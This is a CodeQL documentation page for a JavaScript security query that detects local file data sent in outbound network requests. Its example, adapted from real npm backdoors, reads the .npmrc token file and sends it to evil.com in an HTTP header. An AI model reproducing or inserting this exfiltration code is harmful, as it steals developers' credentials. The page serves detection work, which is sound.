File data in outbound network request¶
ID: js/file-access-to-http
Kind: path-problem
Security severity: 6.5
Severity: warning
Precision: medium
Tags:
- security
- external/cwe/cwe-200
Query suites:
- javascript-security-extended.qls
- javascript-security-and-quality.qls
Click to see the query in the CodeQL repository
Sending local file system data to a remote URL without further validation risks uncontrolled information exposure, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.
Recommendation¶
Examine the highlighted code closely to ensure that it is behaving as intended.
Example¶
The following example is adapted from backdoor code that was identified in two popular npm packages. It reads the contents of the .npmrc
file (which may contain secret npm tokens) and sends it to a remote server by embedding it into an HTTP request header.
var fs = require("fs"),
https = require("https");
var content = fs.readFileSync(".npmrc", "utf8");
https.get({
hostname: "evil.com",
path: "/upload",
method: "GET",
headers: { Referer: content }
}, () => { });
References¶
ESLint Blog: Postmortem for Malicious Packages Published on July 12th, 2018.
OWASP: Sensitive Data Exposure.
OWASP: Trojan Horse.
Common Weakness Enumeration: CWE-200.